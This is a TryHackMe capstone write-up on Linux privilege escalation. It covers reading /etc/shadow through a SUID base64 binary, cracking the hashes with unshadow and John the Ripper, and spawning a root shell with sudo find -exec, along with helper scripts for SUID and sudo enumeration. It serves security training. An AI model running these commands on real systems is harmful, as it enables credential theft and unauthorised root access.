THM Capstone Challenge

First of all: while it may look like a simple 10-minute walkthrough, this took me about 5 hours to complete, with a lot of trial and error on privilege escalation techniques. Before reading this write-up, make sure you understand all the key concepts and try to cover every technique mentioned in the Linux Privilege Escalation TryHackMe section.

Let's dive in!

By now you have a fairly good understanding of the main privilege escalation vectors on Linux and this challenge should be fairly easy.

You have gained SSH access to a large scientific facility. Try to elevate your privileges until you are Root. We designed this room to help you build a thorough methodology for Linux privilege escalation that will be very useful in exams such as OSCP and your penetration testing engagements.

Leave no privilege escalation vector unexplored, privilege escalation is often more an art than a science.

You can access the target machine over your browser or use the SSH credentials below.

  • Username: leonard

  • Password: Penny123

What is the content of the flag1.txt file?

Step 1: Look for any files with SUID or SGID bits set

As leonard we can read /etc/passwd (it is world-readable), but not /etc/shadow, which holds the password hashes and is readable only by root and the shadow group.

To get around this, look for files with the SUID or SGID bit set. A SUID binary runs with the privileges of its owner (often root) no matter who launches it, so a misconfigured one can be turned into a root-level file read or shell:

find / -type f -perm -04000 -ls 2>/dev/null

Note that -perm -04000 only matches SUID files; use -perm -02000 (or combine both) to catch SGID files as well.

/usr/bin/base64 shows up in the list with the SUID bit set, and GTFOBins documents a file-read primitive for it. Because the binary runs as root it can open /etc/shadow; we encode the file with the SUID copy and decode the output on the other side of the pipe:

LFILE=/etc/shadow
/usr/bin/base64 "$LFILE" | base64 --decode
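As an added example (not part of the original write-up), here is a small POSIX shell script that does the SUID/SGID hunt in one pass and flags the binaries whose names match a hand-picked subset of the GTFOBins SUID list. GNU find is assumed for -printf, and the candidate list is an illustrative subset, not the full GTFOBins index.

```shell
#!/bin/sh
# Added example, not code from the original write-up.
# Enumerate SUID and SGID regular files under a directory tree and flag the
# ones whose name appears in a hand-picked subset of the GTFOBins SUID list.
# Assumes GNU find (for -printf).

# Illustrative subset of binaries that GTFOBins lists with a SUID entry.
GTFO_SUID="base64 bash cp env find nmap python3 vim xxd"

# Print "mode path" for every regular file with the SUID (4000) or SGID (2000)
# bit set under $1 (default /). -perm -4000 alone would miss SGID-only files.
list_setid() {
    root="${1:-/}"
    find "$root" -type f \( -perm -4000 -o -perm -2000 \) -printf '%m %p\n' 2>/dev/null
}

# Keep only the entries whose basename is in GTFO_SUID and point at the
# GTFOBins page for that binary.
flag_gtfobins() {
    list_setid "$1" | while read -r mode path; do
        name=${path##*/}
        for b in $GTFO_SUID; do
            if [ "$name" = "$b" ]; then
                printf '%s %s -> https://gtfobins.github.io/gtfobins/%s/#suid\n' "$mode" "$path" "$name"
            fi
        done
    done
}

# Usage: sh enum_setid.sh /      (scans the whole filesystem)
if [ $# -gt 0 ]; then
    flag_gtfobins "$1"
fi
```

Run it with / as the argument on the target; anything it prints is worth a look on GTFOBins, and anything SUID that is not a stock system binary is worth a look even if the script does not flag it.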

Step 2: Unshadow and crack the hash

Now copy both /etc/passwd and /etc/shadow to the attacker machine and use unshadow to merge them into a single file John the Ripper can crack (John wants the passwd fields next to each hash):

With both files in the same directory run the following command:

unshadow passwd.txt shadow.txt > passwords.txt

Then run John the Ripper against it with a wordlist (use john --show passwords.txt afterwards to print whatever was cracked):

john passwords.txt --wordlist=/usr/share/wordlists/rockyou.txt
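To see what unshadow is actually doing, here is an added example (mine, not the write-up's and not John the Ripper's code) that reproduces the merge with awk and then drops the accounts John could never crack. The passwd and shadow files it writes are constructed samples, and the hash strings are placeholders in the $6$ (sha512crypt) format, not real password hashes.

```shell
#!/bin/sh
# Added example, not code from the original write-up.
# Reproduce what unshadow(8) does with awk, then keep only accounts whose
# hash John can attack. Sample files are constructed; hashes are placeholders.

# unshadow: for every passwd line, replace field 2 ("x") with the hash from
# the shadow line of the same user. Output: user:hash:uid:gid:gecos:home:shell
unshadow_awk() {   # $1 = passwd file, $2 = shadow file
    awk -F: 'NR==FNR { hash[$1] = $2; next }
             ($1 in hash) { $2 = hash[$1] }
             { print }' OFS=: "$2" "$1"
}

# Drop entries with no usable hash ("", "*", "!", "!!" mean no password or
# locked). A hash with a leading "!" is an account locked with usermod -L:
# the hash is still valid, so strip the "!" and keep it.
crackable_only() {
    awk -F: 'BEGIN { OFS = ":" }
             $2 == "" || $2 == "*" || $2 == "!" || $2 == "!!" { next }
             { sub(/^!/, "", $2); print }'
}

# Constructed sample files (placeholder hashes, not real ones).
write_samples() {   # $1 = directory to write into
    cat > "$1/passwd.txt" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
leonard:x:1000:1000:leonard:/home/leonard:/bin/bash
missy:x:1001:1001:missy:/home/missy:/bin/bash
guest:x:1002:1002:guest:/home/guest:/bin/bash
EOF
    cat > "$1/shadow.txt" <<'EOF'
root:!:18000:0:99999:7:::
daemon:*:18000:0:99999:7:::
leonard:$6$constructedSalt$leonardPlaceholderHashNotReal:18000:0:99999:7:::
missy:$6$constructedSalt$missyPlaceholderHashNotReal:18000:0:99999:7:::
guest:!$6$constructedSalt$guestPlaceholderHashNotReal:18000:0:99999:7:::
EOF
}

# Write the samples into $1 and print the john-ready, filtered file.
run_demo() {
    write_samples "$1"
    unshadow_awk "$1/passwd.txt" "$1/shadow.txt" | crackable_only
}

# Usage: sh unshadow_demo.sh /tmp/work
if [ $# -gt 0 ]; then
    run_demo "$1"
fi
```

The filtered output is what you would feed to john; on the real files you would skip write_samples and call unshadow_awk on the copied passwd and shadow directly.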

Step 3: Log in as missy and find the flag

SSH to the machine with missy's cracked credentials and read the flag under /home/missy/Documents.

What is the content of the flag2.txt file?

Step 1: Enumerate the privileges of both users

You might have noticed that under /home there is a directory called rootflag, but neither user can access it.

Run the following as both leonard and missy:

sudo -l

missy's output is the interesting one: she is allowed to run /usr/bin/find as root, and the NOPASSWD tag means sudo will not even ask for her password.

Step 2: Look for an exploit on GTFOBins

GTFOBins has a sudo entry for find that we can use to escalate privileges: find's -exec runs an arbitrary command as the user find itself runs as, and under sudo that user is root.

Step 3: Escalate privileges

sudo /usr/bin/find . -exec /bin/sh \; -quit

The -exec spawns /bin/sh as root and -quit makes find stop after the first match, so you get exactly one shell instead of one per file. Privilege escalation done! Now let's grab the flag from /home/rootflag.

And we got it!
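To make the sudo -l triage repeatable, here is an added example (mine, not from the write-up) that parses sudo -l output into per-command rules, tags each one as NOPASSWD or password-required, and flags the commands GTFOBins has a sudo entry for. The sample output is constructed to resemble what a user like missy would see: only the find rule mirrors the write-up, while the hostname, the second rule and the candidate list are assumptions for illustration.

```shell
#!/bin/sh
# Added example, not code from the original write-up.
# Parse `sudo -l` output into "TAG command" lines and flag commands that
# GTFOBins has a sudo entry for. The sample output below is constructed;
# only the find rule mirrors what the write-up describes.

# Illustrative subset of binaries with a sudo entry on GTFOBins.
GTFO_SUDO="awk bash env find less nmap python3 vim"

# Constructed sudo -l output (hostname and the second rule are made up).
sudo_l_sample() {
    cat <<'EOF'
Matching Defaults entries for missy on host:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User missy may run the following commands on host:
    (ALL) NOPASSWD: /usr/bin/find
    (root) /usr/bin/less, /usr/local/bin/backup.sh
EOF
}

# Read sudo -l output on stdin and print one "NOPASSWD cmd" or "PASSWD cmd"
# line per command. Rule lines look like "(runas) [NOPASSWD:] cmd, cmd".
sudo_rules() {
    awk '/^[[:space:]]*\(/ {
            line = $0
            sub(/^[[:space:]]*\([^)]*\)[[:space:]]*/, "", line)
            tag = "PASSWD"
            if (sub(/^NOPASSWD:[[:space:]]*/, "", line)) tag = "NOPASSWD"
            n = split(line, cmds, ",")
            for (i = 1; i <= n; i++) {
                sub(/^[[:space:]]+/, "", cmds[i])
                print tag, cmds[i]
            }
         }'
}

# Keep the rules whose binary is in GTFO_SUDO. PASSWD entries are still
# useful here because we already know the user's password.
gtfo_sudo_hits() {
    sudo_rules | while read -r tag cmd; do
        bin=${cmd%% *}          # drop any fixed arguments in the rule
        name=${bin##*/}
        for b in $GTFO_SUDO; do
            if [ "$name" = "$b" ]; then
                printf '%s %s -> https://gtfobins.github.io/gtfobins/%s/#sudo\n' "$tag" "$cmd" "$name"
            fi
        done
    done
}

# Usage: sudo -l | sh sudo_triage.sh --stdin    (real output on the target)
#        sh sudo_triage.sh --demo               (constructed sample above)
case "${1:-}" in
    --demo)  sudo_l_sample | gtfo_sudo_hits ;;
    --stdin) gtfo_sudo_hits ;;
esac
```

A rule that carries fixed arguments (for example a specific path after the binary) is still reported, but GTFOBins tricks that rely on choosing the arguments yourself may not apply to it, so check the full rule before assuming a hit is exploitable.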

This was a super fun and exciting challenge. It really puts your knowledge of Linux privilege escalation to the test. Make sure you always take notes during your engagements; this keeps your workflow organized and helps you during the enumeration process. Good luck, and remember that continuous learning and practice are key to mastering these skills. Embrace each challenge as an opportunity to grow and enhance your expertise in the field!
